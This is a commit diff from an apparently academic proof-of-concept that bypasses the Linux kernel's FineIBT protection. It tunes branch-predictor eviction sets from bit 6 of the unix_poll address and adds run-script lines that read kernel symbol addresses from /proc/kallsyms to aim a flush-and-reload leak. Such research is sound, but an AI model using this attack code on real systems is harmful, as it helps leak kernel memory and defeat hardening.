[fineibt-bypass] Select PC[6] eviction branch dynamically

vusec · Apr 13, 2024 · c29e4dd · c29e4dd
1 parent 367032f
commit c29e4dd
Show file tree

Hide file tree

Showing 6 changed files with 23 additions and 15 deletions.
diff --git a/experiments/fineibt-bypass/src/colliding_bhb.c b/experiments/fineibt-bypass/src/colliding_bhb.c
@@ -56,7 +56,7 @@ int find_colliding_history(struct config * cfg, uint8_t do_pht_eviction) {
             if(iter % 20000 == 0) {
                 for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
                 {
-                    randomize_branch_locations(cfg->all_pht_cfg[i], 0);
+                    randomize_branch_locations(cfg->all_pht_cfg[i], cfg->pht_bit_set);
                 }
             }
 

diff --git a/experiments/fineibt-bypass/src/evict_pht.c b/experiments/fineibt-bypass/src/evict_pht.c
@@ -124,6 +124,8 @@ void randomize_branch_locations(pht_config * pht_cfg, uint8_t bit_set) {
 
             // addr_off = ((addr_off + JMP_GADGET_OFFSET) & 0xfffffffffffff000 | 0x00b) - JMP_GADGET_OFFSET;
 
+            // Bit 6 of the PC have to be equal for the eviction branches and the
+            // branch to be evicted
             if (bit_set) {
                 addr_off = ((addr_off + JMP_GADGET_OFFSET) | 0x20) - JMP_GADGET_OFFSET;
             } else {

diff --git a/experiments/fineibt-bypass/src/flush_and_reload.h b/experiments/fineibt-bypass/src/flush_and_reload.h
@@ -51,6 +51,7 @@ struct config {
 
     pht_config * pht_cfg;
     pht_config * all_pht_cfg[NUMBER_OF_EVICT_SETS];
+    int pht_bit_set;
 };
 
 void set_load_chain_simple_touch(struct config * cfg, int number_of_loads);

diff --git a/experiments/fineibt-bypass/src/main.c b/experiments/fineibt-bypass/src/main.c
@@ -218,25 +218,25 @@ int main(int argc, char **argv)
                 break;
             default:
                 printf("Usage:\n"
-                    "%s -t TARGET_BASE [options]\n"
+                    "%s -t TARGET_BASE -u UNIX_POLL [options]\n"
                     "  -t TARGET_BASE     target base address (uuid_string)\n"
+                    "  -u UNIX_POLL       unix_poll address (required for pht eviction set)\n"
                     "  -h HISTORY         a previous found colliding history\n"
                     "  -p PHYS_MAP        the start of the physical map\n"
                     "  -f FAST            Disable FineIBT check during collision finding\n"
-                    "  -u                 unix_poll address (required with -f)\n"
                     , argv[0]);
                 exit(1);
         }
     }
 
-    if (target_base == 0) {
+    if (target_base == 0 || unix_poll_addr == 0) {
         printf("Usage:\n"
-            "%s -t TARGET_BASE [options]\n"
+            "%s -t TARGET_BASE -u UNIX_POLL [options]\n"
             "  -t TARGET_BASE     target base address (uuid_string)\n"
+            "  -u UNIX_POLL       unix_poll address (required for pht eviction set)\n"
             "  -h HISTORY         a previous found colliding history\n"
             "  -p PHYS_MAP        the start of the physical map\n"
             "  -f FAST            Disable FineIBT check during collision finding\n"
-            "  -u                 unix_poll address (required with -f)\n"
             , argv[0]);
         exit(1);
     }
@@ -256,11 +256,6 @@ int main(int argc, char **argv)
 
     if (fast_colliding_phase) {
 
-        if (unix_poll_addr == 0) {
-            printf("Please provide the address of unix_poll (-u)\n");
-            exit(EXIT_FAILURE);
-        }
-
         if (access(PATH_PATCH_INSERT_CHECK, F_OK) == 0) {
             cfg.fd_insert_check = open(PATH_PATCH_INSERT_CHECK, O_WRONLY);
             assert(cfg.fd_insert_check);
@@ -340,10 +335,14 @@ int main(int argc, char **argv)
     cfg.tfp_leak_target = (uint8_t *) (target_base + TFP_LEAK_TARGET_OFFSET);
     printf(" - TFP_LEAK_TARGET: %p\n", cfg.tfp_leak_target);
 
+    // Get 6h bit of the the target branch to be evicted (fine-ibt sid check)
+    cfg.pht_bit_set = ((unix_poll_addr - 4) & 0x20) >> 5;
+    printf(" - FINE_IBT SID Branch PC[6]: %d\n", cfg.pht_bit_set);
+
 
     for (size_t i = 0; i < NUMBER_OF_EVICT_SETS; i++)
     {
-        cfg.all_pht_cfg[i] =  init_pht_eviction(0);
+        cfg.all_pht_cfg[i] =  init_pht_eviction(cfg.pht_bit_set);
     }
     printf(" - Allocated %d PHT eviction sets\n", NUMBER_OF_EVICT_SETS);
 
@@ -463,7 +462,7 @@ int main(int argc, char **argv)
 
             for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
             {
-                randomize_branch_locations(cfg.all_pht_cfg[i], 0);
+                randomize_branch_locations(cfg.all_pht_cfg[i], cfg.pht_bit_set);
             }
 
             memset(hit_rates, 0, sizeof(hit_rates));

diff --git a/experiments/fineibt-bypass/src/run.sh b/experiments/fineibt-bypass/src/run.sh
@@ -13,11 +13,15 @@ if [ $# -eq 1 ]
     PHYS_MAP=$1
 fi
 
+echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
+
 make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
 
 UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`
+echo "uuid_string: ${UUID_STRING}"
 
-echo "uid_string: ${UUID_STRING}"
+UNIX_POLL=`cat /proc/kallsyms | grep -w unix_poll | awk '{print $1}'`
+echo "unix_poll: ${UNIX_POLL}"
 
 
-taskset -c 0 ./main -t $UUID_STRING -p $PHYS_MAP
+taskset -c 0 ./main -t $UUID_STRING -u ${UNIX_POLL} -p $PHYS_MAP
diff --git a/experiments/fineibt-bypass/src/run_fast.sh b/experiments/fineibt-bypass/src/run_fast.sh
@@ -13,6 +13,8 @@ if [ $# -eq 1 ]
     PHYS_MAP=$1
 fi
 
+echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
+
 make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
 
 UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`